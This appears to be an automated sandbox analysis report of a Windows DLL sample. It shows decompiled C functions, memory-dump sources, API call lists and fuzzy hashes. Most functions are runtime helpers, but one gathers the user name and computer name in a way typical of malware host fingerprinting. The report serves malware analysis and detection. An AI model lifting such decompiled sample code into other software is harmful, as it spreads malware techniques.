                                                                                                                                                                                                                                0x00a849b6
                                                                                                                                                                                                                                0x00a849e4
                                                                                                                                                                                                                                0x00a849e9
                                                                                                                                                                                                                                0x00a849f0
                                                                                                                                                                                                                                0x00a849f5
                                                                                                                                                                                                                                0x00a849f9
                                                                                                                                                                                                                                0x00a84a2b
                                                                                                                                                                                                                                0x00a849fb
                                                                                                                                                                                                                                0x00a84a08
                                                                                                                                                                                                                                0x00a84a0b
                                                                                                                                                                                                                                0x00a84a1b
                                                                                                                                                                                                                                0x00a84a1e
                                                                                                                                                                                                                                0x00a84a24
                                                                                                                                                                                                                                0x00a84a24
                                                                                                                                                                                                                                0x00a849b8
                                                                                                                                                                                                                                0x00a849c5
                                                                                                                                                                                                                                0x00a849c8
                                                                                                                                                                                                                                0x00a849da
                                                                                                                                                                                                                                0x00a849dd
                                                                                                                                                                                                                                0x00a849dd
                                                                                                                                                                                                                                0x00a84a35
                                                                                                                                                                                                                                0x00a84a41
                                                                                                                                                                                                                                0x00a84a37
                                                                                                                                                                                                                                0x00a84a3a
                                                                                                                                                                                                                                0x00a84a3a
                                                                                                                                                                                                                                0x00a84a35
                                                                                                                                                                                                                                0x00a849ae
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a84975
                                                                                                                                                                                                                                0x00a8491e
                                                                                                                                                                                                                                0x00a84921
                                                                                                                                                                                                                                0x00a84928
                                                                                                                                                                                                                                0x00a8492e
                                                                                                                                                                                                                                0x00a84931
                                                                                                                                                                                                                                0x00a84933
                                                                                                                                                                                                                                0x00a8493f
                                                                                                                                                                                                                                0x00a84942
                                                                                                                                                                                                                                0x00a84942
                                                                                                                                                                                                                                0x00a84948
                                                                                                                                                                                                                                0x00a8494d
                                                                                                                                                                                                                                0x00a8494d
                                                                                                                                                                                                                                0x00a84953
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a84953
                                                                                                                                                                                                                                0x00a84861
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a84888
                                                                                                                                                                                                                                0x00a84888
                                                                                                                                                                                                                                0x00a84894
                                                                                                                                                                                                                                0x00a848a7
                                                                                                                                                                                                                                0x00a848ad
                                                                                                                                                                                                                                0x00a848b5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a848b5

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • StrChrA.SHLWAPI(00A851FC,0000005F,00000000,00000000,00000104), ref: 00A8487A
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 00A848A7
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: lstrlen.KERNEL32(?,00000000,01AE9BB8,00000000,00A86F37,01AE9D96,?,?,?,?,?,69B25F44,00000005,00A8D00C), ref: 00A8303E
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: mbstowcs.NTDLL ref: 00A83067
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: memset.NTDLL ref: 00A83079
                                                                                                                                                                                                                                  • Part of subcall function 00A89BED: lstrlenW.KERNEL32(?,?,?,00A84A10,3D00A8C0,80000002,00A851FC,00A82DE9,74666F53,4D4C4B48,00A82DE9,?,3D00A8C0,80000002,00A851FC,?), ref: 00A89C12
                                                                                                                                                                                                                                  • Part of subcall function 00A853BB: RtlFreeHeap.NTDLL(00000000,00000000,00A812FA,00000000,?,?,00000000), ref: 00A853C7
                                                                                                                                                                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00A848C9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                                                                                                                • String ID: ($\
                                                                                                                                                                                                                                • API String ID: 3924217599-1512714803
                                                                                                                                                                                                                                • Opcode ID: aac0ca58c6c6d0fdcb1a02b84cbc756e4f7cd9e6b07df3d8eec055f80af8351f
                                                                                                                                                                                                                                • Instruction ID: 4db2b5c45e65118aa00ccca3d3e2ef100753a4c37ac07896382d4b0f777e79ce
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aac0ca58c6c6d0fdcb1a02b84cbc756e4f7cd9e6b07df3d8eec055f80af8351f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3517A7210060AEFDF25FFA0DD44EAA7BB9FF08354F104524FA259A161E732DA26DB11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DAB09, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DAB09(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E736DB595(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E736DB595(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E736DA1ED(GetLastError());
									_t17 =  *((intOrPtr*)(E736DA223(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E736DABD0(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E736DA1ED(GetLastError());
						_t17 =  *((intOrPtr*)(E736DA223(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E736DABD0(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E736DABF7(_a8);
				return 0;
			}









                                                                                                                                                                                                                                0x736dab0f
                                                                                                                                                                                                                                0x736dab14
                                                                                                                                                                                                                                0x736dab28
                                                                                                                                                                                                                                0x736dab2b
                                                                                                                                                                                                                                0x736dab5d
                                                                                                                                                                                                                                0x736dab65
                                                                                                                                                                                                                                0x736dab67
                                                                                                                                                                                                                                0x736dab80
                                                                                                                                                                                                                                0x736dab83
                                                                                                                                                                                                                                0x736dab86
                                                                                                                                                                                                                                0x736dab94
                                                                                                                                                                                                                                0x736daba3
                                                                                                                                                                                                                                0x736dabab
                                                                                                                                                                                                                                0x736dabad
                                                                                                                                                                                                                                0x736dabc6
                                                                                                                                                                                                                                0x736dabc9
                                                                                                                                                                                                                                0x736dabc9
                                                                                                                                                                                                                                0x736dabaf
                                                                                                                                                                                                                                0x736dabb6
                                                                                                                                                                                                                                0x736dabc1
                                                                                                                                                                                                                                0x736dabc1
                                                                                                                                                                                                                                0x736dabcb
                                                                                                                                                                                                                                0x736dabcc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dabcc
                                                                                                                                                                                                                                0x736dab8b
                                                                                                                                                                                                                                0x736dab90
                                                                                                                                                                                                                                0x736dab92
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dab92
                                                                                                                                                                                                                                0x736dab70
                                                                                                                                                                                                                                0x736dab7b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dab7b
                                                                                                                                                                                                                                0x736dab2d
                                                                                                                                                                                                                                0x736dab30
                                                                                                                                                                                                                                0x736dab33
                                                                                                                                                                                                                                0x736dab46
                                                                                                                                                                                                                                0x736dab49
                                                                                                                                                                                                                                0x736dab4b
                                                                                                                                                                                                                                0x736dab4d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dab4d
                                                                                                                                                                                                                                0x736dab39
                                                                                                                                                                                                                                0x736dab3e
                                                                                                                                                                                                                                0x736dab40
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dab40
                                                                                                                                                                                                                                0x736dab19
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 736DAB0E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                                                                                                                                                                                                                                • API String ID: 0-1872383224
                                                                                                                                                                                                                                • Opcode ID: 7e6296cbfdd2884b54e2f8e3371bfd6a8e363e8b4503814b0b81eb416b597d58
                                                                                                                                                                                                                                • Instruction ID: a2c6762b99dba583604e148ca0d4e46b457bccef109de54f29a85d27c6923ba1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e6296cbfdd2884b54e2f8e3371bfd6a8e363e8b4503814b0b81eb416b597d58
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40218E72638205AFEF119F71DD80F5A7BBFAB402A87144614E52ADB3C0EB31DD5287A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D8834, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D8834(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x736ef518 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x736e1b00 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E736D9913(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}













                                                                                                                                                                                                                                0x736d883b
                                                                                                                                                                                                                                0x736d88af
                                                                                                                                                                                                                                0x736d8840
                                                                                                                                                                                                                                0x736d8842
                                                                                                                                                                                                                                0x736d8849
                                                                                                                                                                                                                                0x736d884d
                                                                                                                                                                                                                                0x736d8856
                                                                                                                                                                                                                                0x736d8865
                                                                                                                                                                                                                                0x736d886e
                                                                                                                                                                                                                                0x736d8872
                                                                                                                                                                                                                                0x736d88bb
                                                                                                                                                                                                                                0x736d88bd
                                                                                                                                                                                                                                0x736d88c1
                                                                                                                                                                                                                                0x736d88c4
                                                                                                                                                                                                                                0x736d88c4
                                                                                                                                                                                                                                0x736d88ca
                                                                                                                                                                                                                                0x736d88ca
                                                                                                                                                                                                                                0x736d88b6
                                                                                                                                                                                                                                0x736d88ba
                                                                                                                                                                                                                                0x736d88ba
                                                                                                                                                                                                                                0x736d8874
                                                                                                                                                                                                                                0x736d887d
                                                                                                                                                                                                                                0x736d88a7
                                                                                                                                                                                                                                0x736d88aa
                                                                                                                                                                                                                                0x736d88ac
                                                                                                                                                                                                                                0x736d88ac
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d88ac
                                                                                                                                                                                                                                0x736d887f
                                                                                                                                                                                                                                0x736d888a
                                                                                                                                                                                                                                0x736d888f
                                                                                                                                                                                                                                0x736d8894
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d889b
                                                                                                                                                                                                                                0x736d88a1
                                                                                                                                                                                                                                0x736d88a5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d88a5
                                                                                                                                                                                                                                0x736d8852
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8854
                                                                                                                                                                                                                                0x736d88b4
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,736D88F5,00000000,?,00000001,00000000,?,736D896C,00000001,FlsFree,736E1BBC,FlsFree,00000000), ref: 736D88C4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                • Opcode ID: d022294aff87d64663cc2e7493d2bc4e012ee68824be173bd89d749137fc6cb1
                                                                                                                                                                                                                                • Instruction ID: 5d2e58dd57d7c3d07b60fc2566b4470bb635626ff78098474deb944e90907e93
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d022294aff87d64663cc2e7493d2bc4e012ee68824be173bd89d749137fc6cb1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A11CA72E61620EBDF139B69CD4CB4933B9AF41B71F290251E916FB1C4D770E90486D4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D8E50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                                                			E736D8E50(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x736e1104(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






                                                                                                                                                                                                                                0x736d8e56
                                                                                                                                                                                                                                0x736d8e5a
                                                                                                                                                                                                                                0x736d8e65
                                                                                                                                                                                                                                0x736d8e6d
                                                                                                                                                                                                                                0x736d8e78
                                                                                                                                                                                                                                0x736d8e7e
                                                                                                                                                                                                                                0x736d8e82
                                                                                                                                                                                                                                0x736d8e89
                                                                                                                                                                                                                                0x736d8e8f
                                                                                                                                                                                                                                0x736d8e8f
                                                                                                                                                                                                                                0x736d8e91
                                                                                                                                                                                                                                0x736d8e96
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8e9b
                                                                                                                                                                                                                                0x736d8ea4

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,736D8E02,?,?,736D8DCA,?,00000001,?), ref: 736D8E65
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 736D8E78
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,736D8E02,?,?,736D8DCA,?,00000001,?), ref: 736D8E9B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: 8027a243db6af2daf51c8e872d7344f2e109587b5c075c5b3e5d52ecc90fd6f8
                                                                                                                                                                                                                                • Instruction ID: 176e972b41e59aed32b431ad836198e4bbf432327f2d2d4b1fd7f101123bfb0c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8027a243db6af2daf51c8e872d7344f2e109587b5c075c5b3e5d52ecc90fd6f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F05E76A51218FBCF01AB52CE0DB9E7A78FB01B56F204190EC0AE6194CB744E04EA91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A87095, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                			E00A87095() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xa8d364; // 0x1ae95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xa8d364; // 0x1ae95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xa8d364; // 0x1ae95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xa8e823) {
					HeapFree( *0xa8d270, 0, _t10);
					_t7 =  *0xa8d364; // 0x1ae95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                                                                                                                                                                0x00a87095
                                                                                                                                                                                                                                0x00a8709e
                                                                                                                                                                                                                                0x00a870ae
                                                                                                                                                                                                                                0x00a870ae
                                                                                                                                                                                                                                0x00a870b3
                                                                                                                                                                                                                                0x00a870b8
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a870a8
                                                                                                                                                                                                                                0x00a870a8
                                                                                                                                                                                                                                0x00a870ba
                                                                                                                                                                                                                                0x00a870bf
                                                                                                                                                                                                                                0x00a870c3
                                                                                                                                                                                                                                0x00a870d6
                                                                                                                                                                                                                                0x00a870dc
                                                                                                                                                                                                                                0x00a870dc
                                                                                                                                                                                                                                0x00a870e5
                                                                                                                                                                                                                                0x00a870e7
                                                                                                                                                                                                                                0x00a870eb
                                                                                                                                                                                                                                0x00a870f1

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(01AE9570), ref: 00A8709E
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,00A85884), ref: 00A870A8
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,00A85884), ref: 00A870D6
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(01AE9570), ref: 00A870EB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: 0b79c77b6f8378a4021e4abd13699204171a483b334f571e5ab917a8df87432e
                                                                                                                                                                                                                                • Instruction ID: 3faafb050a7b22f8cf0f5b8c73c87f070ce5e79ea6ff2c91997ca9e368682d19
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b79c77b6f8378a4021e4abd13699204171a483b334f571e5ab917a8df87432e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97F0B2B5A08200DFEB18EBA4EE99E1937B4EB05351B144018A502CB2A0D730EC42AB21
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A86706, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A86706() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E00A85157(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E00A853BB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xa8a626
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                                                                                                                                                                                                                0x00a86714
                                                                                                                                                                                                                                0x00a86717
                                                                                                                                                                                                                                0x00a8671a
                                                                                                                                                                                                                                0x00a86720
                                                                                                                                                                                                                                0x00a86725
                                                                                                                                                                                                                                0x00a8672b
                                                                                                                                                                                                                                0x00a86733
                                                                                                                                                                                                                                0x00a86736
                                                                                                                                                                                                                                0x00a8673c
                                                                                                                                                                                                                                0x00a86741
                                                                                                                                                                                                                                0x00a8674e
                                                                                                                                                                                                                                0x00a8675b
                                                                                                                                                                                                                                0x00a8675f
                                                                                                                                                                                                                                0x00a86761
                                                                                                                                                                                                                                0x00a86765
                                                                                                                                                                                                                                0x00a86768
                                                                                                                                                                                                                                0x00a86778
                                                                                                                                                                                                                                0x00a867cb
                                                                                                                                                                                                                                0x00a867cc
                                                                                                                                                                                                                                0x00a8677a
                                                                                                                                                                                                                                0x00a8677f
                                                                                                                                                                                                                                0x00a86780
                                                                                                                                                                                                                                0x00a86785
                                                                                                                                                                                                                                0x00a86788
                                                                                                                                                                                                                                0x00a8679b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8679d
                                                                                                                                                                                                                                0x00a867a0
                                                                                                                                                                                                                                0x00a867a5
                                                                                                                                                                                                                                0x00a867b3
                                                                                                                                                                                                                                0x00a867b6
                                                                                                                                                                                                                                0x00a867bc
                                                                                                                                                                                                                                0x00a867c1
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a867c3
                                                                                                                                                                                                                                0x00a867c3
                                                                                                                                                                                                                                0x00a867c6
                                                                                                                                                                                                                                0x00a867c6
                                                                                                                                                                                                                                0x00a867c1
                                                                                                                                                                                                                                0x00a8679b
                                                                                                                                                                                                                                0x00a867d1
                                                                                                                                                                                                                                0x00a867d2
                                                                                                                                                                                                                                0x00a86741
                                                                                                                                                                                                                                0x00a867d8

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00A8A624), ref: 00A8671A
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00000000,00A8A624), ref: 00A86736
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(00000000,00A8A624), ref: 00A86770
                                                                                                                                                                                                                                • GetComputerNameW.KERNEL32(00A8A624,?), ref: 00A86793
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00A8A624,00000000,00A8A626,00000000,00000000,?,?,00A8A624), ref: 00A867B6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3850880919-0
                                                                                                                                                                                                                                • Opcode ID: b5b67de33bbaf6bae2cfd5f5208afabfa76a614f487a763241dc22b83863b88e
